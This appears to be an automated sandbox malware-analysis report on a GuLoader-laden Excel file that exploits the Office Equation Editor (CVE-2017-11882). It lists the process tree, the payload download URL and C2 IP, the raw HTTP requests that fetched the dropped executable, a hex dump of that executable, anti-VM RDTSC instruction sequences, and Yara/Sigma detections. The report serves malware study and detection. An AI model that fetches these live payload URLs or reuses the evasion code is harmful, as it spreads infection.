
Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Sample Name: MTIR21487610_0062180102_20210714081247.PDF.xlsx
Analysis ID: 449166
MD5: 168c2cabea51b16aa19a152a652254f5
SHA1: 477715c6a9d3219ea85a60eac9c80af83a102357
SHA256: 9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2652 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2184 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2520 cmdline: 'C:\Users\Public\vbc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\Public\vbc.exe | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |
00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |
00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.0.vbc.exe.400000.0.unpack | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |
6.2.vbc.exe.400000.0.unpack | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2184, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2520
Sigma detected: Execution from Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2184, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2520

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Virustotal: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe, Virustotal: Detection: 42%
Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx, ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe, Memory has grown: Private usage: 4MB later: 71MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://ceattire.com/bin_UYDMbHwI28.bin
Source: global traffic, HTTP traffic detected:
HTTP/1.1 200 OK
Date: Thu, 15 Jul 2021 09:06:43 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT
ETag: "41470-5c7043f493d18"
Accept-Ranges: bytes
Content-Length: 267376
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: global traffic, HTTP traffic detected:
GET /cpu/.svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 180.214.239.39
Connection: Keep-Alive
Source: unknown, TCP traffic detected without corresponding DNS query: 180.214.239.39 (50 identical events)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf
Source: global traffic, HTTP traffic detected:
GET /cpu/.svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 180.214.239.39
Connection: Keep-Alive
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://ocsp.digicert.com0O
Source: 300F3110.emf.0.dr, String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr, String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr, String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Source: C:\Users\Public\vbc.exe, Process Stats: CPU usage > 98%
Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E54E7 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E55AC NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E54E7
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E7036
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E100E
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E4071
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E80D4
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E2958
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E2940
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E29B0
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E2183
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E42CD
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E72C3
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E1B2D
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E1B1A
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E7B73
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E1B5F
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E4B8E
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E8385
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E43F1
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E341B
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E844C
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E8C82
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E8CD5
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E34C4
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E350F
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E8D58
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E7D52
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E0EFE
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E3F0C
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E7F03
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E7F6D
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E0FB5
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E2793
Source: C:\Users\Public\vbc.exe, Code function: 6_2_003E4785
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
Source: Joe Sandbox View, Dropped File: C:\Users\Public\vbc.exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
Source: .svchost[1].exe.4.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRE205.tmp
Source: C:\Users\Public\vbc.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx, ReversingLabs: Detection: 28%
Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx, Static file information: File size 1268792 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx, Initial sample: OLE indicators vbamacros = False
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx, Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match, File source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match, File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Source: C:\Users\Public\vbc.exe, Code function: 6_2_0040495E push es; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00221774 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00221023 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00222823 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00224023 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00227024 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00225825 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00224833 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00223033 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00221833 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00226034 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00220038 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00224803 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00223003 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00221803 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00226004 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00220008 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00223813 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00225013 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00222014 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00226814 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00220818 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00223063 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00221863 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00224863 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00226065 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00220068 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00222074 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00223874 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00225074 push edx; ret
Source: C:\Users\Public\vbc.exe, Code function: 6_2_00226875 push edx; ret
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX (9 identical events)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process information set: NOOPENFILEERRORBOX (8 identical events)
Source: C:\Users\Public\vbc.exe, Process information set: NOOPENFILEERRORBOX
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxStream path 'EncryptedPackage' entropy: 7.99875082678 (max. 8.0)

                Malware Analysis System Evasion:

                Contains functionality to detect hardware virtualization (CPUID execution measurement)
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E7036
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E100E
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E4071
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E2958
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E42CD
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E1B1A
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E1B5F
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E43F1
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E341B
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E7D52
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E0EFE
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E0FB5
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E6F9E
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E2793
                Detected RDTSC dummy instruction sequence (likely for instruction hammering)
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
